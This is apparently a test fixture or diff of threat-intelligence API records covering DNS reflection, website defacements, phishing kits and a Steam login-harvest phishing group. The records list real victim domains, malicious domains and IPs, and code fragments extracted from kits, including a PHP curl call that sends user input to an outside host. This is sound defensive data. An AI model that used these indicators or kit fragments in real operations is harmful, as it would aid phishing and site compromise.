"2019-10-22T22:33:35+00:00", + "dateEnd": "2019-10-22T22:34:49+00:00", + "dateReg": "2019-10-23T00:00:00+00:00", + "malware": null, + "evaluation": { + "admiraltyCode": "C2", + "credibility": 70, + "reliability": 60, + "severity": "orange", + "tlp": "green", + "ttl": 30 + }, + "messageLink": null, + "oldId": "192838071", + "duration": 74, + "protocol": "udp", + "seqUpdate": 1677065083, + "source": "honeypot_logs:1", + "sourceRowId": "11015631", + "stixGuid": "eb0e8ebf-f24b-7063-7702-1146335bb591", + "target": { + "ipv4": { + "asn": null, + "city": null, + "region": null, + "provider": "Amazon.com", + "countryCode": "US", + "countryName": "United States", + "ip": "18.191.111.103" + }, + "url": null, + "category": null, + "domainsCount": 0, + 
"port": 5353, + "domain": null + }, + "threatActor": null, + "requestData": { + "link": null, + "headers": {}, + "headersHash": null, + "body": null, + "bodyHash": null + }, + "type": "DNS Reflection", + "displayOptions": { + "isHidden": false, + "isFavourite": false + } + } + ], + "settings": { + "search": { + "tags": [ + "target_ip_country_name", + "target_category", + "cnc_ip_country_name", + "malware", + "cybercrime_new", + "cybercrime", + "threat_actor", + "company", + "company_id", + "type", + "options", + "target_ip", + "target_domain", + "id", + "source" + ], + "fields": [ + "target_ip", + "ip", + "target_domain", + "domain", + "target_domain.tree", + "target_ip_country_name", + "target_category", + "cnc_ip", + "cnc_ip_country_name", + "malware", + "type", + "cybercrime", + "cybercrime_new", + "threat_actor", + "seqUpdate", + "source", + "id" + ], + "sorts": [ + "last_seen", + "date_reg", + "seqUpdate" + ] + } + }, + "seqUpdate": 1677065083 + }, + "attacks/deface":{ + "count": 17197503, + "items": [ + { + "contacts": [], + "date": "2016-04-26T05:42:48Z", + "evaluation": { + "admiraltyCode": "B2", + "credibility": 80, + "reliability": 80, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "59695fabb1965600014bae7b", + "mirrorLink": "https://deface.ti-files.com/id:-59695fabb1965600014bae7b:", + "portalLink": "https://tap-stage.ci-kuber.gibdev.net/attacks/deface?searchValue=id:59695fabb1965600014bae7b", + "providerDomain": "defacer.id", + "seqUpdate": 1508430053029213, + "siteUrl": "http://med-supplies.de/?sky008", + "source": "defacer.id", + "targetDomain": "med-supplies.de", + "targetDomainProvider": null, + "targetIp": { + "asn": "AS25504", + "city": null, + "countryCode": "DE", + "countryName": "Germany", + "ip": "89.200.168.133", + "provider": "Vautron Rechenzentrum AG", + "region": "Europe" + }, + "threatActor": { + "country": null, + "id": "9c94863e3602876b5e0150a7cbb926dda6556e03", + "isAPT": false, + "name": "Sky008", + "stixGuid": 
null + }, + "tsCreate": "2016-04-26T05:42:48Z", + "url": "http://med-supplies.de/?sky008" + }, + { + "contacts": [], + "date": "2016-04-26T11:27:37Z", + "evaluation": { + "admiraltyCode": "B2", + "credibility": 80, + "reliability": 80, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "59695f29b1965600014badf1", + "mirrorLink": "https://deface.ti-files.com/id:-59695f29b1965600014badf1:", + "portalLink": "https://tap-stage.ci-kuber.gibdev.net/attacks/deface?searchValue=id:59695f29b1965600014badf1", + "providerDomain": "defacer.id", + "seqUpdate": 1508430053047578, + "siteUrl": "http://www.distribuidora.com.mx/?sky008", + "source": "defacer.id", + "targetDomain": "www.distribuidora.com.mx", + "targetDomainProvider": null, + "targetIp": { + "asn": "AS36444", + "city": null, + "countryCode": "US", + "countryName": "United States", + "ip": "192.240.166.56", + "provider": "NEXCESS-NET", + "region": "North America" + }, + "threatActor": { + "country": null, + "id": "9c94863e3602876b5e0150a7cbb926dda6556e03", + "isAPT": false, + "name": "Sky008", + "stixGuid": null + }, + "tsCreate": "2016-04-26T11:27:37Z", + "url": "http://www.distribuidora.com.mx/?sky008" + }, + { + "contacts": [], + "date": "2016-04-26T11:18:28Z", + "evaluation": { + "admiraltyCode": "B2", + "credibility": 80, + "reliability": 80, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "59695f1ab1965600014bade5", + "mirrorLink": "https://deface.ti-files.com/id:-59695f1ab1965600014bade5:", + "portalLink": "https://tap-stage.ci-kuber.gibdev.net/attacks/deface?searchValue=id:59695f1ab1965600014bade5", + "providerDomain": "defacer.id", + "seqUpdate": 1508430053049467, + "siteUrl": "http://petplanetshop.com.ar/api.php?sky008", + "source": "defacer.id", + "targetDomain": "petplanetshop.com.ar", + "targetDomainProvider": null, + "targetIp": { + "asn": "AS7303", + "city": "Rosario", + "countryCode": "AR", + "countryName": "Argentina", + "ip": "181.88.192.28", + "provider": "Telecom 
Argentina S.A.", + "region": "South America" + }, + "threatActor": { + "country": null, + "id": "9c94863e3602876b5e0150a7cbb926dda6556e03", + "isAPT": false, + "name": "Sky008", + "stixGuid": null + }, + "tsCreate": "2016-04-26T11:18:28Z", + "url": "http://petplanetshop.com.ar/api.php?sky008" + } + ], + "seqUpdate": 1508430053049467 + }, + "attacks/phishing_kit":{ + "count": 122834, + "items": [ + { + "id": "5cf5afc22dfa08252e990c9e3fc51e287ff54dc53742767a7428dc31b25dd606", + "hash": "5cf5afc22dfa08252e990c9e3fc51e287ff54dc53742767a7428dc31b25dd606", + "seqUpdate": 1523520752839, + "dateDetected": "2018-03-09T22:19:59+00:00", + "dateFirstSeen": "2018-03-09T22:19:59+00:00", + "dateLastSeen": "2018-03-27T13:18:38+00:00", + "downloadedFrom": [ + { + "date": "2018-03-09T22:19:59+03:00", + "url": "https://gt-mywyty186338.codeanyapp.com/cb.zip", + "phishingUrl": "", + "domain": "gt-mywyty186338.codeanyapp.com", + "fileName": "" + } + ], + "emails": [], + "login": "PhishingKitFetcher", + "path": "https://tap.group-ib.com/api/v2/malware/phishing_kit/5cf5afc22dfa08252e990c9e3fc51e287ff54dc53742767a7428dc31b25dd606/file/5cf5afc22dfa08252e990c9e3fc51e287ff54dc53742767a7428dc31b25dd606", + "source": [ + "ci-PhishKit" + ], + "targetBrand": [], + "telegramIds": null, + "variables": [ + { + "type": "DB", + "filePath": "./cb/pages/jsp-ns/cargando.php", + "values": [ + "host: $mysql_host", + "login: ***********", + "password: ***************" + ] + }, + { + "type": "DB", + "filePath": "./cb/pages/jsp-ns/email-notify.php", + "values": [ + "host: 104.196.210.132", + "login: ****", + "password: *************" + ] + }, + { + "type": "DB", + "filePath": "./cb/pages/jsp-ns/index.php", + "values": [ + "host: 104.196.210.132", + "login: ****", + "password: *************" + ] + } + ], + "threatActors": null, + "evaluation": { + "admiraltyCode": "B2", + "credibility": 80, + "reliability": 70, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "isFavourite": false, + "isHidden": 
false + }, + { + "id": "33b5093d2c5492ee49241bf3fd736a5013081ebc6a7cb4df6b295924e4a73131", + "hash": "33b5093d2c5492ee49241bf3fd736a5013081ebc6a7cb4df6b295924e4a73131", + "seqUpdate": 1523520763952, + "dateDetected": "2018-02-28T00:46:20+00:00", + "dateFirstSeen": "2018-02-28T00:46:20+00:00", + "dateLastSeen": "2018-03-27T13:18:48+00:00", + "downloadedFrom": [], + "emails": [], + "login": "PhishingKitFetcher", + "path": "https://tap.group-ib.com/api/v2/malware/phishing_kit/33b5093d2c5492ee49241bf3fd736a5013081ebc6a7cb4df6b295924e4a73131/file/33b5093d2c5492ee49241bf3fd736a5013081ebc6a7cb4df6b295924e4a73131", + "source": [ + "api" + ], + "targetBrand": [], + "telegramIds": null, + "variables": [ + { + "type": "LOG", + "filePath": "./blnoxxue/blviituer.php", + "values": [ + "path: \"wtuds\" . \"/\" . $_GET[\"altr\"]" + ] + }, + { + "type": "LOG", + "filePath": "./blnoxxue/uogirue.php", + "values": [ + "path: $cache_folder . \"/\" . $_GET[\"altr\"]" + ] + }, + { + "type": "LOG", + "filePath": "./blnoxxue/xbbiyurt.php", + "values": [ + "path: $cache_folder . \"/\" . 
$_GET[\"altr\"]" + ] + }, + { + "type": "CURL", + "filePath": "./blnoxxue/blviituer.php", + "values": [ + "url: \"http://solfinesew.pw/story2.php?pass=qwerty8&q={$_GET['altr']}\"", + "url: \"https://www.ask.com/web?q={mb_strtolower(str_replace(\" \", \"+\", str_replace(\" \", \"+\", $keyword))_2)}&qo=pagination&qsrc=998&page={$page}\"", + "url: \"http://www.google.com/search?q={mb_strtolower(str_replace(\" \", \"+\", str_replace(\" \", \"+\", $keyword))_2)}&start={$google_n}\"", + "url: \"http://search.yahoo.com/search?p={mb_strtolower(str_replace(\" \", \"+\", str_replace(\" \", \"+\", $keyword))_2)}&fr=yfp-t&fr2=sb-top&fp=1&b={$page}&pz=10&bct=0&xargs=0\"" + ] + }, + { + "type": "CURL", + "filePath": "./blnoxxue/uogirue.php", + "values": [ + "url: \"http://solfinesew.pw/story2.php?pass=qwerty8&q={$_GET['altr']}\"", + "url: \"https://www.ask.com/web?q={mb_strtolower(str_replace(\" \", \"+\", str_replace(\" \", \"+\", $keyword))_2)}&qo=pagination&qsrc=998&page={$page}\"", + "url: \"http://www.google.com/search?q={mb_strtolower(str_replace(\" \", \"+\", str_replace(\" \", \"+\", $keyword))_2)}&start={$google_n}\"", + "url: \"http://search.yahoo.com/search?p={mb_strtolower(str_replace(\" \", \"+\", str_replace(\" \", \"+\", $keyword))_2)}&fr=yfp-t&fr2=sb-top&fp=1&b={$page}&pz=10&bct=0&xargs=0\"" + ] + }, + { + "type": "CURL", + "filePath": "./blnoxxue/xbbiyurt.php", + "values": [ + "url: \"http://solfinesew.pw/story2.php?pass=qwerty8&q={$_GET['altr']}\"", + "url: \"https://www.ask.com/web?q={mb_strtolower(str_replace(\" \", \"+\", str_replace(\" \", \"+\", $keyword))_2)}&qo=pagination&qsrc=998&page={$page}\"", + "url: \"http://www.google.com/search?q={mb_strtolower(str_replace(\" \", \"+\", str_replace(\" \", \"+\", $keyword))_2)}&start={$google_n}\"", + "url: \"http://search.yahoo.com/search?p={mb_strtolower(str_replace(\" \", \"+\", str_replace(\" \", \"+\", $keyword))_2)}&fr=yfp-t&fr2=sb-top&fp=1&b={$page}&pz=10&bct=0&xargs=0\"" + ] + } + ], + "threatActors": 
null, + "evaluation": { + "admiraltyCode": "B2", + "credibility": 80, + "reliability": 70, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "isFavourite": false, + "isHidden": false + }, + { + "id": "1ff2f4033df6dce75504c808d765889a69f9d9c024893cf02b6f65b48e652f70", + "hash": "1ff2f4033df6dce75504c808d765889a69f9d9c024893cf02b6f65b48e652f70", + "seqUpdate": 1523520767270, + "dateDetected": "2018-02-23T22:40:36+00:00", + "dateFirstSeen": "2018-02-23T22:40:36+00:00", + "dateLastSeen": "2018-03-27T13:18:51+00:00", + "downloadedFrom": [], + "emails": [], + "login": "PhishingKitFetcher", + "path": "https://tap.group-ib.com/api/v2/malware/phishing_kit/1ff2f4033df6dce75504c808d765889a69f9d9c024893cf02b6f65b48e652f70/file/1ff2f4033df6dce75504c808d765889a69f9d9c024893cf02b6f65b48e652f70", + "source": [ + "api" + ], + "targetBrand": [], + "telegramIds": null, + "variables": null, + "threatActors": null, + "evaluation": { + "admiraltyCode": "B2", + "credibility": 80, + "reliability": 70, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "isFavourite": false, + "isHidden": false + } + ], + "settings": { + "search": { + "fields": [ + "company", + "domain", + "has_connection_vars", + "target_brand" + ], + "tags": [ + "203051", + "options", + "target_brand" + ] + } + }, + "seqUpdate": 1523520767270 + }, + "attacks/phishing_group":{ + "count": 8439182, + "items": [ + { + "brand": "Valve Steam", + "countPhishing": 20, + "date": { + "blocked": "2017-12-07T08:37:11+03:00", + "added": "2015-04-30T23:26:52+03:00", + "detected": "2017-10-11T20:36:03+03:00", + "blockedIndexed": null, + "updated": "2021-01-18T14:42:36+03:00" + }, + "domain": "accsteamorigin.sells.com.ua", + "domainInfo": { + "domain": "accsteamorigin.sells.com.ua", + "domainPuny": "accsteamorigin.sells.com.ua", + "expirationDate": null, + "registered": null, + "registrar": null, + "tld": "ua", + "title": "Steam Community", + "category": [] + }, + "domainTitle": "Steam Community", + "evaluation": { + 
"admiraltyCode": "C3", + "credibility": 50, + "reliability": 50, + "severity": "red", + "tlp": "amber", + "ttl": 0 + }, + "falsePositive": false, + "groupLifetime": 81361, + "id": "f2a145de56f5c3767eaeaa2dc8baff69ed157f4a34659b0611bf2530e3d34257", + "ip": [ + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line 
Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + } + ], + "objective": [ + "Login harvest" + ], + "phishingKitArray": [], + "screenshot": { + "pageHtml": { + "hashSha256": "h:cfaea13d115982fe593364e5d2a4e47436681010e094eb752a78e92a469ee252", + "filetype": "pageHtml", + "filename": "h:cfaea13d115982fe593364e5d2a4e47436681010e094eb752a78e92a469ee252", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:536691c2f90954d9af264ebb947e5fde4425d91a34157d34518f4f2449e709b1", + "filetype": "pageScreen", + "filename": "s:536691c2f90954d9af264ebb947e5fde4425d91a34157d34518f4f2449e709b1", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "seqUpdate": 1430425612098642, + "signature": { + "resource": [], + "screen": [], + "manual": [ + "Steam_we_see_u" + ] + }, + "source": [ + "SafeSearch" + ], + "status": 1, + "threatActor": { + "id": "", + "name": "", + "nameIndexed": "", + "isAPT": false + }, + "uniqueTitles": [ + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + 
"faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + } + ], + "urlListLink": "", + "whitelist": false, + "phishing": [ + { + "id": "4c6c37c06977d8ba6ea9c3e356af7bbd248a1a6a189b4720c5fcb2d67dbc0254", + "url": 
"http://accsteamorigin.sells.com.ua/products?sort=default&size=30", + "date": { + "blocked": "2017-11-18T00:40:56+03:00", + "added": "2017-11-10T16:36:54+03:00", + "detected": "2017-11-10T16:36:54+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:afeb54bfc3cf4bd8ea984626ce01742be80c573b876961c1e37786ad86cc5a2a", + "filetype": "pageHtml", + "filename": "h:afeb54bfc3cf4bd8ea984626ce01742be80c573b876961c1e37786ad86cc5a2a", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "filetype": "pageScreen", + "filename": "s:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "bce7ef8bfc136d48ffe2888f4d8b9fa9e14640bb5901bdbcfc075e3ac4eeacb7", + "url": "http://accsteamorigin.sells.com.ua/products?size=10&page=4", + "date": { + "blocked": "2017-11-14T08:16:01+03:00", + "added": "2017-11-10T16:36:54+03:00", + "detected": "2017-11-10T16:36:54+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": 
"UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:a28117d088b88babeb5ce148e1f73ce21a93b9d35361b6ac640b6c5633703272", + "filetype": "pageHtml", + "filename": "h:a28117d088b88babeb5ce148e1f73ce21a93b9d35361b6ac640b6c5633703272", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:c18b6529f3bb143a54d0ee96cc4955a7eb7441b7589ac7922d716bb694a0b654", + "filetype": "pageScreen", + "filename": "s:c18b6529f3bb143a54d0ee96cc4955a7eb7441b7589ac7922d716bb694a0b654", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "0f41b79fd897eaf5b6950a09712f3a0c7cc3042389beb813a2f021473bec6726", + "url": "http://accsteamorigin.sells.com.ua/products?page=5&sort=cheap", + "date": { + "blocked": "2017-12-07T08:37:11+03:00", + "added": "2017-11-04T16:38:46+03:00", + "detected": "2017-11-04T16:38:46+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:5ffb301a1ca8ec018bb1f1b3b9999939c8ec584e4784366840e95a749e32fd46", + "filetype": "pageHtml", + "filename": "h:5ffb301a1ca8ec018bb1f1b3b9999939c8ec584e4784366840e95a749e32fd46", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:4bef02ccc066f86a4d0c81fc1150846d7dc49cadcd1b8dc79d07b5759be72896", + "filetype": "pageScreen", + "filename": 
"s:4bef02ccc066f86a4d0c81fc1150846d7dc49cadcd1b8dc79d07b5759be72896", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "793197298b0240d00fd6717014e0fa30db98f7bf867254124d9a221ff9097fa6", + "url": "http://accsteamorigin.sells.com.ua/products?page=1&sort=cheap", + "date": { + "blocked": "2017-12-07T07:24:00+03:00", + "added": "2017-10-11T23:07:34+03:00", + "detected": "2017-10-11T23:07:34+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:5ffb301a1ca8ec018bb1f1b3b9999939c8ec584e4784366840e95a749e32fd46", + "filetype": "pageHtml", + "filename": "h:5ffb301a1ca8ec018bb1f1b3b9999939c8ec584e4784366840e95a749e32fd46", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:4bef02ccc066f86a4d0c81fc1150846d7dc49cadcd1b8dc79d07b5759be72896", + "filetype": "pageScreen", + "filename": "s:4bef02ccc066f86a4d0c81fc1150846d7dc49cadcd1b8dc79d07b5759be72896", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "52688b4712a11e4266f3acabb80872a69b251ea3484ca7f810dd2ef705947342", + "url": "http://accsteamorigin.sells.com.ua/akkauntyi-origin/c2?sort=expensive&page=1&size=30", + "date": { + "blocked": "2017-12-07T07:23:55+03:00", + "added": "2017-10-11T22:58:59+03:00", + "detected": "2017-10-11T22:58:59+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": 
"Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:38066505b5660dfdd3e21d7b7ef7bb4e9290229f10b5a9368c3dbe8d8fbbb466", + "filetype": "pageHtml", + "filename": "h:38066505b5660dfdd3e21d7b7ef7bb4e9290229f10b5a9368c3dbe8d8fbbb466", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:cf6a9b87835706a3b7e66ba70ab38392a9b8718717bfcdf370bbc7436fa19a55", + "filetype": "pageScreen", + "filename": "s:cf6a9b87835706a3b7e66ba70ab38392a9b8718717bfcdf370bbc7436fa19a55", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "afcd42feb05c0b9b4e725e4266bd1e9ca092627706f954750f7ec38b168e7820", + "url": "http://accsteamorigin.sells.com.ua/command-conquer-red-alert-3/p27", + "date": { + "blocked": "2017-11-07T05:06:19+03:00", + "added": "2017-10-11T22:45:22+03:00", + "detected": "2017-10-11T22:45:22+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:f4235c27d5d1aa5952035dd51b4299e5c81fd0bf377d915f12f8e2902458328c", + "filetype": "pageHtml", + "filename": 
"h:f4235c27d5d1aa5952035dd51b4299e5c81fd0bf377d915f12f8e2902458328c", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:a335c8435e7773ad5d805df814a79cccb31bcf414d1df7527697038db5960c74", + "filetype": "pageScreen", + "filename": "s:a335c8435e7773ad5d805df814a79cccb31bcf414d1df7527697038db5960c74", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "32268ec99874164fb09655e899adcc44964a9b88844919fc9b6fc0930d188344", + "url": "http://accsteamorigin.sells.com.ua/akkauntyi-origin/c2?sort=expensive&size=10", + "date": { + "blocked": "2017-12-07T07:23:52+03:00", + "added": "2017-10-11T22:14:20+03:00", + "detected": "2017-10-11T22:14:20+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:6413fb9f0b0a2869a40fe6e970d6fc638cc0cc9fe4c664f5d1c99f56fa3c36b7", + "filetype": "pageHtml", + "filename": "h:6413fb9f0b0a2869a40fe6e970d6fc638cc0cc9fe4c664f5d1c99f56fa3c36b7", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "filetype": "pageScreen", + "filename": "s:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "399987ec3383d660e5833b7396a817884fbe2eb8a14eae715bfeb8bcce329978", + "url": 
"http://accsteamorigin.sells.com.ua/akkauntyi-steam/c1?size=10&sort=name", + "date": { + "blocked": "2017-12-07T07:23:52+03:00", + "added": "2017-10-11T22:14:24+03:00", + "detected": "2017-10-11T22:14:24+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:d2bae3ff95a90fcc43485921a13e156c3f7e3c5d119fb79b786d69a27be47278", + "filetype": "pageHtml", + "filename": "h:d2bae3ff95a90fcc43485921a13e156c3f7e3c5d119fb79b786d69a27be47278", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "filetype": "pageScreen", + "filename": "s:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + 